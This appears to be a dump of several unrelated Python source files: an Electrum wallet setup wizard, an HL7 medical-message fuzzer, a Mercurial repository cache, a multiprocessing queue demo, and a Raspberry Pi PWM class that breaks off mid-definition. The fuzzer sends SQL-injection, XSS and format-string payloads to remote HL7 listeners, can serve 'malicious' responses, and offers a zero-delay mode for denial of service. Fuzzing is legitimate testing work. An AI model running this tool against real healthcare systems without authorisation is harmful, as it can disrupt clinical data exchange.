                        self.logger.exception('')
                        self.show_message(title=_('Error'), msg=str(e))
                        raise UserCancelled()
                elif self.temp_storage.is_encrypted_with_hw_device():
                    try:
                        self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
                    except InvalidPassword as e:
                        self.show_message(title=_('Error'),
                                          msg=_('Failed to decrypt using this hardware device.') + '\n' +
                                              _('If you use a passphrase, make sure it is correct.'))
                        # Restart the whole page so the user can try again.
                        self.reset_stack()
                        return self.select_storage(path, get_wallet_from_daemon)
                    except BaseException as e:
                        self.logger.exception('')
                        self.show_message(title=_('Error'), msg=str(e))
                        raise UserCancelled()
                    if self.temp_storage.is_past_initial_decryption():
                        break
                    else:
                        raise UserCancelled()
                else:
                    raise Exception('Unexpected encryption version')
        return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None)
    def run_upgrades(self, storage):
        """Handle storage-level migrations before the wallet is opened.

        Covers: splitting pre-2.7 multi-account wallets, resuming an
        incompletely created wallet, and plain format upgrades.  Raises
        UserCancelled where the flow must stop without using the old
        storage.
        """
        path = storage.path
        if storage.requires_split():
            self.hide()
            msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
                    "Do you want to split your wallet into multiple files?").format(path)
            if not self.question(msg):
                return
            file_list = '\n'.join(storage.split_accounts())
            msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
            if self.question(msg):
                os.remove(path)
                self.show_warning(_('The file was removed'))
            # raise now, to avoid having the old storage opened
            raise UserCancelled()
        action = storage.get_action()
        if action and storage.requires_upgrade():
            raise WalletFileException('Incomplete wallet files cannot be upgraded.')
        if action:
            # Wallet creation was interrupted; offer to resume or delete it.
            self.hide()
            msg = _("The file '{}' contains an incompletely created wallet.\n"
                    "Do you want to complete its creation now?").format(path)
            if not self.question(msg):
                if self.question(_("Do you want to delete '{}'?").format(path)):
                    os.remove(path)
                    self.show_warning(_('The file was removed'))
                return
            self.show()
            self.data = storage.db.data # FIXME
            self.run(action)
            # Persist whatever the resumed wizard action produced.
            for k, v in self.data.items():
                storage.put(k, v)
            storage.write()
            return
        if storage.requires_upgrade():
            self.upgrade_storage(storage)
    def finished(self):
        """Called in hardware client wrapper, in order to close popups."""
        return

    def on_error(self, exc_info):
        # Report unexpected exceptions to the user; deliberate cancels
        # (UserCancelled) stay silent.
        if not isinstance(exc_info[1], UserCancelled):
            self.logger.error("on_error", exc_info=exc_info)
            self.show_error(str(exc_info[1]))

    def set_icon(self, filename):
        """Swap the sidebar logo; return the previously shown filename."""
        prior_filename, self.icon_filename = self.icon_filename, filename
        self.logo.setPixmap(QPixmap(icon_path(filename))
                            .scaledToWidth(60, mode=Qt.SmoothTransformation))
        return prior_filename

    def set_layout(self, layout, title=None, next_enabled=True):
        """Install *layout* as the current wizard page and reset the buttons."""
        self.title.setText("<b>%s</b>"%title if title else "")
        self.title.setVisible(bool(title))
        # Get rid of any prior layout by assigning it to a temporary widget
        prior_layout = self.main_widget.layout()
        if prior_layout:
            QWidget().setLayout(prior_layout)
        self.main_widget.setLayout(layout)
        self.back_button.setEnabled(True)
        self.next_button.setEnabled(next_enabled)
        if next_enabled:
            self.next_button.setFocus()
        self.main_widget.setVisible(True)
        self.please_wait.setVisible(False)

    def exec_layout(self, layout, title=None, raise_on_cancel=True,
                    next_enabled=True):
        """Show *layout* and block until a button is pressed.

        Raises UserCancelled on cancel (unless raise_on_cancel is False)
        and GoBack on "Back"; afterwards switches the dialog into its
        "please wait" state and returns the event-loop exit code.
        """
        self.set_layout(layout, title, next_enabled)
        result = self.loop.exec_()
        if not result and raise_on_cancel:
            raise UserCancelled
        if result == 1:
            raise GoBack from None
        self.title.setVisible(False)
        self.back_button.setEnabled(False)
        self.next_button.setEnabled(False)
        self.main_widget.setVisible(False)
        self.please_wait.setVisible(True)
        self.refresh_gui()
        return result

    def refresh_gui(self):
        # For some reason, to refresh the GUI this needs to be called twice
        self.app.processEvents()
        self.app.processEvents()

    def remove_from_recently_open(self, filename):
        """Drop *filename* from the recently-opened wallets in the config."""
        self.config.remove_from_recently_open(filename)
    def text_input(self, title, message, is_valid, allow_multi=False):
        """Page with a free-form keys/xpub text box; returns the entered text."""
        slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
                             allow_multi=allow_multi)
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_text()

    def seed_input(self, title, message, is_seed, options):
        """Page with a seed-phrase box; returns (seed, is_bip39, is_ext)."""
        slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_seed(), slayout.is_bip39, slayout.is_ext

    @wizard_dialog
    def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
        # Ask for a master public key (or WIF keys when show_wif_help is set).
        header_layout = QHBoxLayout()
        label = WWLabel(message)
        label.setMinimumWidth(400)
        header_layout.addWidget(label)
        if show_wif_help:
            header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
        return self.text_input(title, header_layout, is_valid, allow_multi)

    @wizard_dialog
    def add_cosigner_dialog(self, run_next, index, is_valid):
        # Ask for cosigner *index*'s xpub (or xprv to co-sign on their behalf).
        title = _("Add Cosigner") + " %d"%index
        message = ' '.join([
            _('Please enter the master public key (xpub) of your cosigner.'),
            _('Enter their master private key (xprv) if you want to be able to sign for them.')
        ])
        return self.text_input(title, message, is_valid)

    @wizard_dialog
    def restore_seed_dialog(self, run_next, test):
        # opt_ext / opt_bip39 are flags set by BaseWizard for the chosen
        # wallet kind; they enable the corresponding seed options.
        options = []
        if self.opt_ext:
            options.append('ext')
        if self.opt_bip39:
            options.append('bip39')
        title = _('Enter Seed')
        message = _('Please enter your seed phrase in order to restore your wallet.')
        return self.seed_input(title, message, test, options)

    @wizard_dialog
    def confirm_seed_dialog(self, run_next, test):
        # Clear the clipboard so the seed cannot simply be pasted back.
        self.app.clipboard().clear()
        title = _('Confirm Seed')
        message = ' '.join([
            _('Your seed is important!'),
            _('If you lose your seed, your money will be permanently lost.'),
            _('To make sure that you have properly saved your seed, please retype it here.')
        ])
        seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
        return seed

    @wizard_dialog
    def show_seed_dialog(self, run_next, seed_text):
        # Display the newly generated seed; returns whether the user
        # requested a seed extension ('ext').
        title = _("Your wallet generation seed is:")
        slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
        self.exec_layout(slayout)
        return slayout.is_ext
    def pw_layout(self, msg, kind, force_disable_encrypt_cb):
        """Run a new-password page; return (password, encrypt_storage?)."""
        playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
                                 force_disable_encrypt_cb=force_disable_encrypt_cb)
        playout.encrypt_cb.setChecked(True)  # encryption is opt-out
        self.exec_layout(playout.layout())
        return playout.new_password(), playout.encrypt_cb.isChecked()

    @wizard_dialog
    def request_password(self, run_next, force_disable_encrypt_cb=False):
        """Request the user enter a new password and confirm it. Return
        the password or None for no password."""
        return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)

    @wizard_dialog
    def request_storage_encryption(self, run_next):
        # Hardware wallets hold the secrets; only ask whether to encrypt
        # the wallet file itself.
        playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
        playout.encrypt_cb.setChecked(True)
        self.exec_layout(playout.layout())
        return playout.encrypt_cb.isChecked()

    @wizard_dialog
    def confirm_dialog(self, title, message, run_next):
        self.confirm(message, title)

    def confirm(self, message, title):
        """Show *message* and wait for Next/Cancel."""
        label = WWLabel(message)
        vbox = QVBoxLayout()
        vbox.addWidget(label)
        self.exec_layout(vbox, title)

    @wizard_dialog
    def action_dialog(self, action, run_next):
        self.run(action)

    def terminate(self, **kwargs):
        # Close the dialog via a signal so this is safe to call from
        # non-GUI threads.
        self.accept_signal.emit()

    def waiting_dialog(self, task, msg, on_finished=None):
        """Run *task* in a worker thread while displaying *msg*.

        Polls the worker at ~60 Hz, pumping the Qt event loop between
        polls so the GUI stays responsive; optionally calls *on_finished*
        in this (GUI) context afterwards.
        """
        label = WWLabel(msg)
        vbox = QVBoxLayout()
        vbox.addSpacing(100)
        label.setMinimumWidth(300)
        label.setAlignment(Qt.AlignCenter)
        vbox.addWidget(label)
        self.set_layout(vbox, next_enabled=False)
        self.back_button.setEnabled(False)
        t = threading.Thread(target=task)
        t.start()
        while True:
            t.join(1.0/60)
            if t.is_alive():
                self.refresh_gui()
            else:
                break
        if on_finished:
            on_finished()
    @wizard_dialog
    def choice_dialog(self, title, message, choices, run_next):
        # Radio-button page; *choices* is [(value, label), ...] and the
        # selected value is returned.
        c_values = [x[0] for x in choices]
        c_titles = [x[1] for x in choices]
        clayout = ChoicesLayout(message, c_titles)
        vbox = QVBoxLayout()
        vbox.addLayout(clayout.layout())
        self.exec_layout(vbox, title)
        action = c_values[clayout.selected_index()]
        return action

    def query_choice(self, msg, choices):
        """called by hardware wallets"""
        clayout = ChoicesLayout(msg, choices)
        vbox = QVBoxLayout()
        vbox.addLayout(clayout.layout())
        self.exec_layout(vbox, '')
        return clayout.selected_index()

    @wizard_dialog
    def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
                               message2: str, test_text: Callable[[str], int],
                               run_next, default_choice_idx: int=0) -> Tuple[str, str]:
        """Choice plus a text field whose default text follows the choice.

        *choices* is [(value, label, default_text), ...]; returns
        (entered_text, chosen_value).
        """
        vbox = QVBoxLayout()
        c_values = [x[0] for x in choices]
        c_titles = [x[1] for x in choices]
        c_default_text = [x[2] for x in choices]
        def on_choice_click(clayout):
            # Selecting a choice resets the line edit to its default text.
            idx = clayout.selected_index()
            line.setText(c_default_text[idx])
        clayout = ChoicesLayout(message1, c_titles, on_choice_click,
                                checked_index=default_choice_idx)
        vbox.addLayout(clayout.layout())
        vbox.addSpacing(50)
        vbox.addWidget(WWLabel(message2))
        line = QLineEdit()
        def on_text_change(text):
            # Gate the Next button on the caller-supplied validator.
            self.next_button.setEnabled(test_text(text))
        line.textEdited.connect(on_text_change)
        on_choice_click(clayout)  # set default text for "line"
        vbox.addWidget(line)
        self.exec_layout(vbox, title)
        choice = c_values[clayout.selected_index()]
        return str(line.text()), choice
    @wizard_dialog
    def line_dialog(self, run_next, title, message, default, test, warning='',
                    presets=(), warn_issue4566=False):
        # Single-line text input with optional preset buttons.  When
        # warn_issue4566 is set, a warning is shown for leading/trailing
        # or repeated whitespace (see Electrum issue #4566).
        vbox = QVBoxLayout()
        vbox.addWidget(WWLabel(message))
        line = QLineEdit()
        line.setText(default)
        def f(text):
            self.next_button.setEnabled(test(text))
            if warn_issue4566:
                text_whitespace_normalised = ' '.join(text.split())
                warn_issue4566_label.setVisible(text != text_whitespace_normalised)
        line.textEdited.connect(f)
        vbox.addWidget(line)
        vbox.addWidget(WWLabel(warning))
        warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
        warn_issue4566_label.setVisible(False)
        vbox.addWidget(warn_issue4566_label)
        for preset in presets:
            # text=preset[1] binds the value now, avoiding the late-binding
            # closure pitfall inside this loop.
            button = QPushButton(preset[0])
            button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
            button.setMinimumWidth(150)
            hbox = QHBoxLayout()
            hbox.addWidget(button, alignment=Qt.AlignCenter)
            vbox.addLayout(hbox)
        self.exec_layout(vbox, title, next_enabled=test(default))
        return line.text()

    @wizard_dialog
    def show_xpub_dialog(self, xpub, run_next):
        # Display-only page showing the wallet's master public key.
        msg = ' '.join([
            _("Here is your master public key."),
            _("Please share it with your cosigners.")
        ])
        vbox = QVBoxLayout()
        layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
        vbox.addLayout(layout.layout())
        self.exec_layout(vbox, _('Master Public Key'))
        return None
    def init_network(self, network):
        """Ask how to connect to a server: auto-connect or manual selection."""
        message = _("Electrum communicates with remote servers to get "
                    "information about your transactions and addresses. The "
                    "servers all fulfill the same purpose only differing in "
                    "hardware. In most cases you simply want to let Electrum "
                    "pick one at random. However if you prefer feel free to "
                    "select a server manually.")
        choices = [_("Auto connect"), _("Select server manually")]
        title = _("How do you want to connect to a server? ")
        clayout = ChoicesLayout(message, choices)
        self.back_button.setText(_('Cancel'))
        self.exec_layout(clayout.layout(), title)
        r = clayout.selected_index()
        if r == 1:
            # Manual selection: show the full network-configuration page.
            nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
            if self.exec_layout(nlayout.layout()):
                nlayout.accept()
        else:
            network.auto_connect = True
            self.config.set_key('auto_connect', True, True)

    @wizard_dialog
    def multisig_dialog(self, run_next):
        """Pick m-of-n multisig parameters with two sliders; returns (m, n)."""
        cw = CosignWidget(2, 2)
        m_edit = QSlider(Qt.Horizontal, self)
        n_edit = QSlider(Qt.Horizontal, self)
        n_edit.setMinimum(2)
        n_edit.setMaximum(15)
        m_edit.setMinimum(1)
        m_edit.setMaximum(2)
        n_edit.setValue(2)
        m_edit.setValue(2)
        n_label = QLabel()
        m_label = QLabel()
        grid = QGridLayout()
        grid.addWidget(n_label, 0, 0)
        grid.addWidget(n_edit, 0, 1)
        grid.addWidget(m_label, 1, 0)
        grid.addWidget(m_edit, 1, 1)
        def on_m(m):
            m_label.setText(_('Require {0} signatures').format(m))
            cw.set_m(m)
        def on_n(n):
            n_label.setText(_('From {0} cosigners').format(n))
            cw.set_n(n)
            m_edit.setMaximum(n)  # m can never exceed n
        n_edit.valueChanged.connect(on_n)
        m_edit.valueChanged.connect(on_m)
        on_n(2)
        on_m(2)
        vbox = QVBoxLayout()
        vbox.addWidget(cw)
        vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
        vbox.addLayout(grid)
        self.exec_layout(vbox, _("Multi-Signature Wallet"))
        m = int(m_edit.value())
        n = int(n_edit.value())
        return (m, n)
|
hl7fuzz.py | #Hl7 message fuzzer
#twitter: 0xRaindrop
import argparse
import socket
import queue
from os import listdir, urandom
from random import randrange, choice
from sqlalchemy import create_engine, Table, Column, String, MetaData
from time import time_ns,sleep
import numpy
import re
import threading
import _thread
class hl7fuzz():
    """Dumb HL7-over-MLLP message fuzzer.

    Depending on the parsed command-line arguments this either:
      * acts as a client: reads baseline messages from disk, mutates them
        with several payload strategies and sends them to a remote HL7
        listener; or
      * acts as a server: accepts connections and answers every received
        message with a fuzz payload.
    Every sent/received pair is recorded in a per-session SQLite database.
    """

    def __init__(self, cmdargs):
        self.bq = queue.Queue()  # baseline (template) messages
        self.fq = queue.Queue()  # fuzzed messages ready to transmit
        self.cmdargs = cmdargs
        self.KillT = 0  # flag polled by the sender thread; 1 = stop
        # MLLP framing bytes: <VT> message <FS><CR>
        self.header = b'\x0b'
        self.tail = b'\x1c\x0d'
        self.badstrings = []
        with open('payloads/badstrings.txt','rb') as bads:
            for i,j in enumerate(bads.readlines()):
                if j[0] != 35:  # 35 == ord('#'): skip comment lines
                    self.badstrings.append(j.replace(b'\r\n',b''))
        self.badstrings = list(set(self.badstrings))  # dedupe; ordering becomes arbitrary
        # NOTE(review): because set() ordering is arbitrary, this pop(0)
        # discards a *random* payload, not a specific one — confirm intent.
        self.badstrings.pop(0)
        self.sock = socket.socket()
        # Dispatch on the configured mode; the constructor blocks until the
        # chosen session finishes.
        if self.cmdargs.server and self.cmdargs.serverport:
            self.hl7server()
        elif self.cmdargs.ip and self.cmdargs.port and self.cmdargs.server == 0:
            self.grab()
        else:
            print("[INFO] No HL7 remote server IP and port were set.. Exiting...!")

    def dbSRhl7(self):
        """Create a fresh per-session SQLite DB with a (sent, recv) table.

        Returns (engine, table) for the caller to insert log rows with.
        """
        self.dbname = f"hl7sessionfuzz-{time_ns()}.db" if not self.cmdargs.server else f"hl7sessionfuzz-server-{time_ns()}.db"
        self.engine = create_engine(f'sqlite:///DB/{self.dbname}', echo=False)
        self.metadata = MetaData()
        fuzzsession = Table(
            'fuzzhl7', self.metadata,
            Column('sent', String),
            Column('recv', String), )
        self.metadata.create_all(self.engine)
        return self.engine, fuzzsession

    def grab(self):
        """Queue every baseline HL7 message from the messages folder, then fuzz."""
        print("[-] Queuing baseline messages.")
        for message in listdir(self.cmdargs.folder):
            with open(f"{self.cmdargs.folder}/{message}", 'rb') as msg:
                self.bq.put(b''.join(msg.readlines()))
        print("\t-Done!")
        self.fuzz()

    def fuzz(self):
        """Generate fuzzed samples from the baseline queue and feed the sender thread."""
        print("[-] Connecting to server...")
        self.sender = threading.Thread(target=self.transmit)
        self.sender.start()
        print("[-] Creating & sending samples...")
        if self.cmdargs.target is not None:
            # Targeted mode: replace every occurrence of the user-supplied
            # marker in each message with a random payload.
            while not self.bq.empty():
                msg = self.bq.get()
                # Payload strategies, re-randomised per baseline message.
                # NOTE(review): the payload files are re-read per message and
                # the handles are never closed — consider caching the lists.
                self.fmtstr = [b"%n" * randrange(1, self.cmdargs.max), b"%c" * randrange(1, self.cmdargs.max),
                               b"%s" * randrange(1, self.cmdargs.max), b"%p" * randrange(1, self.cmdargs.max),
                               b"%d" * randrange(1, self.cmdargs.max)]
                self.sqli = [i for i in open('payloads/sqli.txt', 'rb').readlines()]
                self.xss = [i for i in open('payloads/xss.txt', 'rb').readlines()]
                self.elements = [b'^' * randrange(1, self.cmdargs.max), b'\\' * randrange(1, self.cmdargs.max),
                                 b'&' * randrange(1, self.cmdargs.max), b'~' * randrange(1, self.cmdargs.max)]
                self.strats = [b"A" * randrange(1, self.cmdargs.max), urandom(randrange(1, self.cmdargs.max)),
                               choice(self.elements), choice(self.sqli), choice(self.xss),
                               choice(self.fmtstr), choice(self.badstrings)]
                for i in range(self.cmdargs.samples):
                    try:
                        msg1 = re.sub(self.cmdargs.target.encode() ,choice(self.strats),msg)
                    except:
                        # The payload broke re.sub (e.g. bad replacement
                        # escapes); fall back to a fixed filler.
                        msg1 = re.sub(self.cmdargs.target.encode(), b"\xcc"*10, msg)
                    self.fq.put(self.header + msg1 + self.tail)
        else:
            # Random mode: mutate an arbitrary field of each segment.
            try:
                line, fld = self.cmdargs.change.split(',')
            except:
                line, fld = (-1,-1)  # no forced field requested
            while not self.bq.empty():
                x = self.bq.get()
                for q in range(self.cmdargs.samples):
                    msg = []
                    arr = numpy.array(x.split(b'\n'))
                    for i, j in enumerate(arr):
                        arr2 = j.split(b"|")
                        for k, l in enumerate(arr2):
                            try:
                                if self.cmdargs.allparts == 0 and i == 0:
                                    pass  # leave the MSH segment untouched unless -a is set
                                else:
                                    # NOTE(review): self.strats is only assigned in the
                                    # targeted branch above (and in new_hl7_client), so in
                                    # this branch choice(self.strats) appears to raise
                                    # AttributeError, which the bare except below swallows —
                                    # i.e. no mutation may actually happen here.  Verify.
                                    arr2[randrange(1, len(arr2))] = choice(self.strats)
                                if int(line) > -1:
                                    arr2[int(fld)] = randrange(11234532, 9999999999).to_bytes(10,'big')
                                break
                            except:
                                pass
                        msg.append(b'|'.join(arr2))
                    if self.cmdargs.clientmode == 0:
                        self.fq.put(self.header + b''.join(msg) + self.tail)
                    else:
                        self.fq.put(b''.join(msg))
        # Wait for the sender to drain the queue; Ctrl-C sets the kill flag.
        while True:
            try:
                sleep(10)
                if self.sender.is_alive() == False:
                    print("[-]Fuzz session completed.\n\t-Sockets closed...\n\t-Exiting!")
                    self.sender.join()
                    exit()
            except KeyboardInterrupt:
                self.KillT = 1
                print("[-]Fuzz session completed.\n\t-Sockets closed...\n\t-Exiting!")
                self.sender.join()
                exit()

    def transmit(self):
        """Sender thread: connect once, then drain the fuzz queue, logging each exchange."""
        self.sock.connect((self.cmdargs.ip, self.cmdargs.port))
        print(f"[-]Connected to: {self.cmdargs.ip}:{self.cmdargs.port}")
        dbobj, _table = self.dbSRhl7()
        dbconnect = dbobj.connect()
        while True:
            if self.KillT == 1:
                break  # main thread requested shutdown
            if self.fq.empty():
                break
            send_hl7 = self.fq.get()
            try:
                self.sock.send(send_hl7)
                recv_reply = self.sock.recv(5000)
            except Exception as e:
                # NOTE(review): reconnects by calling transmit() recursively
                # on every socket error; repeated failures will grow the
                # call stack, and the message that failed is dropped.
                self.sock.close()
                self.transmit()
                print(e)
                continue
            if self.cmdargs.noisey:
                print(f"{'-' * 40}Q-size[{self.fq.qsize()}]\nSent:\n{send_hl7}\n++++++++++++++++++++++\nRecevied:\n{recv_reply}")
            else:
                print(f"{'-' * 40}Q-size[{self.fq.qsize()}]\nRecevied:\n{recv_reply}")
            try:
                _insert = _table.insert().values(sent=send_hl7, recv=recv_reply)
                dbconnect.execute(_insert.execution_options(autocommit=True))
            except Exception as e:
                print("failed to insert into DB")
            sleep(self.cmdargs.delay)
        dbconnect.close()
        self.sock.close()
        print("Finishing up, Exiting in 10 seconds...")
        return

    def new_hl7_client(self,clientS, addr):
        """Per-connection server worker: answer each received message with a payload."""
        dbobj, _table = self.dbSRhl7()
        dbconnect = dbobj.connect()
        while True:
            # Fresh payload strategies for every message.
            self.fmtstr = [b"%n" * randrange(1, self.cmdargs.max), b"%c" * randrange(1, self.cmdargs.max),
                           b"%s" * randrange(1, self.cmdargs.max), b"%p" * randrange(1, self.cmdargs.max),
                           b"%d" * randrange(1, self.cmdargs.max)]
            self.sqli = [i for i in open('payloads/sqli.txt', 'rb').readlines()]
            self.xss = [i for i in open('payloads/xss.txt', 'rb').readlines()]
            self.elements = [b'^' * randrange(1, self.cmdargs.max), b'\\' * randrange(1, self.cmdargs.max),
                             b'&' * randrange(1, self.cmdargs.max), b'~' * randrange(1, self.cmdargs.max)]
            self.strats = [b"A" * randrange(1, self.cmdargs.max), urandom(randrange(1, self.cmdargs.max)),
                           choice(self.elements), choice(self.sqli), choice(self.xss),
                           choice(self.fmtstr), choice(self.badstrings)]
            try:
                try:
                    msg = clientS.recv(1024)
                    print(addr, ' >> ', msg)
                except:
                    break
                if not msg:
                    break  # peer closed the connection
                # servermode 0: MLLP-framed payload; otherwise raw payload.
                send_hl7 = self.header+choice(self.strats)+self.tail if self.cmdargs.servermode == 0 else choice(self.strats)
                print(f"\n\n{send_hl7}\n\n---------------------------")
                clientS.send(send_hl7)
                try:
                    _insert = _table.insert().values(sent=send_hl7, recv=msg)
                    dbconnect.execute(_insert.execution_options(autocommit=True))
                except Exception as e:
                    print("failed to insert into DB")
            except KeyboardInterrupt:
                break
        clientS.close()

    def hl7server(self):
        """Accept loop: spawn a new_hl7_client worker thread per connection."""
        s = socket.socket()
        s.bind(('',self.cmdargs.serverport))
        s.listen(5)
        while True:
            try:
                c, addr = s.accept()
                _thread.start_new_thread(self.new_hl7_client, (c, addr))
            except KeyboardInterrupt:
                break
        s.close()
        exit()
# CLI entry point: parse options and start a fuzzing session.
if __name__ == '__main__':
    cmdopts = argparse.ArgumentParser(description='An extremely dumb HL7 message fuzzer.')
    cmdopts.add_argument("-f", "--folder", help="Folder containing a hl7 messages as text files.", default="messages")
    cmdopts.add_argument("-d", "--ip", help="Destination Ip address.", required=False)
    cmdopts.add_argument("-p", "--port", help="Destination port.", required=False, type=int)
    cmdopts.add_argument("-s", "--samples", help="Number of samples to generate.", required=False, type=int, default=3000)
    cmdopts.add_argument("-c", "--change", help="Fields to always change.", required=False)
    cmdopts.add_argument("-m", "--max", type=int, help="Max length of fuzz generated string.", required=False, default=10)
    cmdopts.add_argument("-t", "--target", help="Will change from random fuzz payload insertion into messages to defined areas that you selected from a message which are defined by a delimiter of your choice.", required=False)
    cmdopts.add_argument("-a", "--allparts", help="This will allow you to parse the first segment of an HL7 message instead of skipping the first segment.", required=False, type=int ,default=0)
    cmdopts.add_argument("-v", "--noisey",help="to show both sent and received messages set this to 1",required=False, type=int, default=0)
    cmdopts.add_argument("-x", "--delay", help="delay interval between sending packets. Set this to 0 for DoS attack/stress testing.", required=False,type=int, default=1)
    # type=int is required here: without it an explicit "-b 0" parses as the
    # truthy string '0', which both enables server mode and breaks the
    # `cmdargs.server == 0` client check in hl7fuzz.__init__.
    cmdopts.add_argument("-b","--server",help="Setup a server to respond with malicious HL7 messages.",required=False, type=int, default=0)
    cmdopts.add_argument("-bp", "--serverport", help="Setup the server port respond with malicious HL7 messages.",required=False, type=int)
    cmdopts.add_argument("-bm", "--servermode", help="Setup the server to respond with malicious (generic or HL7) messages.", required=False, type=int)
    cmdopts.add_argument("-cm", "--clientmode", help="Setup the client to respond with malicious (generic or HL7) messages.", required=False, type=int)
    cmdargs = cmdopts.parse_args()
    hl7f = hl7fuzz(cmdargs)
|
repocache.py | # repocache.py - in-memory repository cache for long-running services
#
# Copyright 2018 Yuya Nishihara <yuya@tcha.org>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import collections
import gc
import threading
from . import (
error,
hg,
obsolete,
scmutil,
util,
)
class repoloader(object):
    """Load repositories in background thread

    This is designed for a forking server. A cached repo cannot be obtained
    until the server fork()s a worker and the loader thread stops.
    """

    def __init__(self, ui, maxlen):
        self._ui = ui.copy()
        self._cache = util.lrucachedict(max=maxlen)
        # use deque and Event instead of Queue since deque can discard
        # old items to keep at most maxlen items.
        self._inqueue = collections.deque(maxlen=maxlen)
        self._accepting = False
        self._newentry = threading.Event()
        self._thread = None

    def start(self):
        """Spawn the loader thread (no-op when caching is disabled)."""
        assert not self._thread
        if self._inqueue.maxlen == 0:
            # no need to spawn loader thread as the cache is disabled
            return
        self._accepting = True
        self._thread = threading.Thread(target=self._mainloop)
        self._thread.start()

    def stop(self):
        """Stop the loader thread and discard cached and pending entries."""
        if not self._thread:
            return
        self._accepting = False
        self._newentry.set()  # wake the thread so it observes _accepting == False
        self._thread.join()
        self._thread = None
        self._cache.clear()
        self._inqueue.clear()

    def load(self, path):
        """Request to load the specified repository in background"""
        self._inqueue.append(path)
        self._newentry.set()

    def get(self, path):
        """Return a cached repo if available

        This function must be called after fork(), where the loader thread
        is stopped. Otherwise, the returned repo might be updated by the
        loader thread.
        """
        if self._thread and self._thread.is_alive():
            raise error.ProgrammingError(
                b'cannot obtain cached repo while loader is active'
            )
        return self._cache.peek(path, None)

    def _mainloop(self):
        # Loader-thread body: wait for load() requests and process them
        # one at a time until stop() clears _accepting.
        while self._accepting:
            # Avoid heavy GC after fork(), which would cancel the benefit of
            # COW. We assume that GIL is acquired while GC is underway in the
            # loader thread. If that isn't true, we might have to move
            # gc.collect() to the main thread so that fork() would never stop
            # the thread where GC is in progress.
            gc.collect()
            self._newentry.wait()
            while self._accepting:
                self._newentry.clear()
                try:
                    path = self._inqueue.popleft()
                except IndexError:
                    break
                # The lambda is invoked immediately by callcatch, so the
                # late-binding of `path` is not an issue here.
                scmutil.callcatch(self._ui, lambda: self._load(path))

    def _load(self, path):
        """Open the repo at *path*, warm its caches, and insert it into the LRU."""
        start = util.timer()
        # TODO: repo should be recreated if storage configuration changed
        try:
            # pop before loading so inconsistent state wouldn't be exposed
            repo = self._cache.pop(path)
        except KeyError:
            repo = hg.repository(self._ui, path).unfiltered()
        _warmupcache(repo)
        repo.ui.log(
            b'repocache',
            b'loaded repo into cache: %s (in %.3fs)\n',
            path,
            util.timer() - start,
        )
        self._cache.insert(path, repo)
# TODO: think about proper API of preloading cache
def _warmupcache(repo):
    """Populate expensive repo caches so a forked worker inherits them.

    The bare attribute accesses are intentional: they trigger lazy
    (propertycache) loading purely for the side effect.
    """
    repo.invalidateall()
    repo.changelog
    repo.obsstore._all
    repo.obsstore.successors
    repo.obsstore.predecessors
    repo.obsstore.children
    for name in obsolete.cachefuncs:
        obsolete.getrevs(repo, name)
    repo._phasecache.loadphaserevs(repo)
# TODO: think about proper API of attaching preloaded attributes
def copycache(srcrepo, destrepo):
    """Attach srcrepo's preloaded filecache entries to destrepo."""
    src = srcrepo._filecache
    dest = destrepo._filecache
    if b'changelog' in src:
        entry = dest[b'changelog'] = src[b'changelog']
        # retarget the cached changelog at the destination's store vfs
        entry.obj.opener = entry.obj._realopener = destrepo.svfs
    if b'obsstore' in src:
        entry = dest[b'obsstore'] = src[b'obsstore']
        entry.obj.svfs = destrepo.svfs
    if b'_phasecache' in src:
        entry = dest[b'_phasecache'] = src[b'_phasecache']
        entry.obj.opener = destrepo.svfs
|
04_queue1.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from multiprocessing import Queue, Process
import time, random
def write(q):
    """Producer: push four messages onto *q*, pausing briefly after each."""
    if not q.full():
        for item in ["a", "b", "c", "d"]:
            print("向队列中添加消息 %s" % item)
            q.put(item)
            # random pause (< 1s) to simulate work
            time.sleep(random.random())
def read(q):
    """Consumer: drain *q* batch by batch until it is found empty."""
    while True:
        if q.empty():
            break
        # consume everything currently queued, then pause
        for _ in range(q.qsize()):
            print(q.get())
        time.sleep(random.random())
if __name__ == "__main__":
q = Queue()
p1 = Process(target=write, args=(q,))
p1.start()
p1.join()
p2 = Process(target=read, args=(q,))
p2.start()
p2.join() |
pwm.py | import RPi.GPIO as GPIO
from time import sleep
from threading import Thread
class pwm_control():
    """Differential-drive motor controller built on two GPIO PWM channels.

    Each side has one PWM pin (speed) and two enable pins (direction).
    Two worker threads continuously push the current direction and duty
    cycle to the hardware until isBusy is cleared.
    """

    def __init__(self):
        # Pin assignments (BOARD numbering)
        self.right_pwm_pin = 32
        self.left_pwm_pin = 33
        self.right_pwm_en_1 = 11
        self.left_pwm_en_1 = 13
        self.right_pwm_en_2 = 15
        self.left_pwm_en_2 = 16
        # True = forward, False = reverse
        self.car_direction_right = True
        self.car_direction_left = True
        self.isBusy = True            # workers run while True
        self.right_pwm_value = 0      # requested duty cycles (0-100)
        self.left_pwm_value = 0
        self.isClose = 0              # count of workers that have exited

        # GPIO pin setup
        GPIO.setwarnings(False)
